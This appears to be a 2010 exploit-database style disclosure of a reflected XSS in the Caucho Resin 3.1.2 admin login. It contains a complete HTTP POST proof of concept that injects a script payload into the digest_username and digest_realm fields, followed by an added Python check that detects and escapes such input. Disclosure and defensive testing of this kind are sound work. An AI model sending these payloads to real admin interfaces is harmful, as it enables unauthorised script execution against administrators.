Hi brother, I want to post a vuln in the Caucho Resin web server.

# Exploit Title: Caucho Resin web server 3.1.2 Admin Login digest_username & digest_realm XSS Vulnerability
# Date: 2010-05-17
# Author: flyh4t
# Software Link: http://www.caucho.com/
# Version: Professional 3.1.2
# CVE : no

 

PoC (no login needed):

POST /resin-admin/ HTTP/1.1
Accept: */*
Referer: http://1.1.1.1/resin-admin/
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; msn OptimizedIE8;ZHCN)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 1.1.1.1
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=abc7CGMIyBwpNgFko8MIs

 

digest_username=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&digest_password1=&digest_password2=&digest_realm=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&digest_attempt=true
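
A defender-side check for the request above, as an added example that is not part of the original report: it decodes the form body, flags HTML-active characters in the two parameters named in the title, and shows HTML-escaping neutralising the value on output. The `render_input` template and the benign sample body are hypothetical; the report does not show how resin-admin echoes these fields.

```python
import html
from urllib.parse import parse_qs

# Constructed samples: the form body from the report, and a benign login body.
POC_BODY = (
    "digest_username=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22"
    "&digest_password1=&digest_password2="
    "&digest_realm=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22"
    "&digest_attempt=true"
)
BENIGN_BODY = ("digest_username=admin&digest_password1=x&digest_password2=x"
               "&digest_realm=resin&digest_attempt=true")

# The two parameters the report names as reflected.
REFLECTED_FIELDS = ("digest_username", "digest_realm")
# Characters that can change HTML structure if echoed unescaped.
HTML_ACTIVE = set("<>\"'&")


def parse_form(body):
    """Percent-decode an application/x-www-form-urlencoded body into a dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def flag_fields(body):
    """Return the reflected fields whose decoded value contains HTML-active characters."""
    form = parse_form(body)
    return [f for f in REFLECTED_FIELDS if HTML_ACTIVE & set(form.get(f, ""))]


def render_input(name, value, escape=True):
    """Hypothetical template: echo a submitted value into an input's value attribute."""
    if escape:
        # quote=True also encodes " and ', so the value cannot close the attribute.
        value = html.escape(value, quote=True)
    return '<input name="%s" value="%s">' % (name, value)


if __name__ == "__main__":
    print("flagged in PoC body:   ", flag_fields(POC_BODY))
    print("flagged in benign body:", flag_fields(BENIGN_BODY))
    user = parse_form(POC_BODY)["digest_username"]
    print("unescaped:", render_input("digest_username", user, escape=False))
    print("escaped:  ", render_input("digest_username", user, escape=True))
```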
 		 	   		  